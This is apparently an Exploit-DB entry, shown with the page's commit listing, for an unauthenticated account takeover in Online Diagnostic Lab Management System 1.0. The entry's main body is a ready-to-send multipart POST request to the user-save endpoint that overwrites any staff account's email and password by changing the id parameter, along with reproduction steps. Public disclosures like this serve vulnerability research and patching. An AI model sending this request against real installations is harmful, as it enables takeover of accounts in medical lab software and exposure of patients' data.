
8 changes to exploits/shellcodes Hospitals Patient Records Management System 1.0 - 'room_types' Stored Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'room_list' Stored Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS) SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated) Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated) Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS) Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated) WordPress Core 5.8.2 - 'WP_Query' SQL Injection
86 lines
No EOL
2.9 KiB
Text
86 lines
No EOL
2.9 KiB
Text
#Exploit Title: Online Diagnostic Lab Management System 1.0 - Account Takeover (Unauthenticated)
|
|
#Date: 11/01/2022
|
|
#Exploit Author: Himash
|
|
#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html
|
|
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip
|
|
#Version: 1.0
|
|
#Tested on: Kali Linux
|
|
|
|
|
|
Online Diagnostic Lab Management System 1.0 is vulnerable to unauthenticated account takeover.
|
|
An attacker can takeover any registered 'Staff' user account by just sending below POST request
|
|
By changing the the "id", "email", "password" and "cpass" parameters.
|
|
|
|
#Steps to Reproduce
|
|
|
|
1. Send the below POST request by changing "id", "email", "password" and "cpass" parameters.
|
|
|
|
2. Log in to the user account by changed email and password.
|
|
|
|
POST /odlms/classes/Users.php?f=save_client HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
|
|
Accept: */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=---------------------------218422725412817326673495861673
|
|
Content-Length: 1551
|
|
Origin: http://localhost
|
|
Connection: close
|
|
Referer: http://localhost/odlms/?page=user
|
|
Cookie: PHPSESSID=b17cc4d8837f564fc77d7b3e49b00d1e
|
|
Sec-Fetch-Dest: empty
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Site: same-origin
|
|
|
|
-----------------------------218422725412817326673495861673
|
|
Content-Disposition: form-data; name="id"
|
|
|
|
2
|
|
-----------------------------218422725412817326673495861673
|
|
Content-Disposition: form-data; name="firstname"
|
|
|
|
Claire
|
|
-----------------------------218422725412817326673495861673
|
|
Content-Disposition: form-data; name="middlename"
|
|
|
|
C
|
|
-----------------------------218422725412817326673495861673
|
|
Content-Disposition: form-data; name="lastname"
|
|
|
|
Blake
|
|
-----------------------------218422725412817326673495861673
|
|
Content-Disposition: form-data; name="gender"
|
|
|
|
Female
|
|
-----------------------------218422725412817326673495861673
|
|
Content-Disposition: form-data; name="dob"
|
|
|
|
1997-10-14
|
|
-----------------------------218422725412817326673495861673
|
|
Content-Disposition: form-data; name="contact"
|
|
|
|
09456789123
|
|
-----------------------------218422725412817326673495861673
|
|
Content-Disposition: form-data; name="address"
|
|
|
|
Sample Address only
|
|
-----------------------------218422725412817326673495861673
|
|
Content-Disposition: form-data; name="email"
|
|
|
|
test@test.com
|
|
-----------------------------218422725412817326673495861673
|
|
Content-Disposition: form-data; name="password"
|
|
|
|
Test@1234
|
|
-----------------------------218422725412817326673495861673
|
|
Content-Disposition: form-data; name="cpass"
|
|
|
|
Test@1234
|
|
-----------------------------218422725412817326673495861673
|
|
Content-Disposition: form-data; name="img"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
-----------------------------218422725412817326673495861673-- |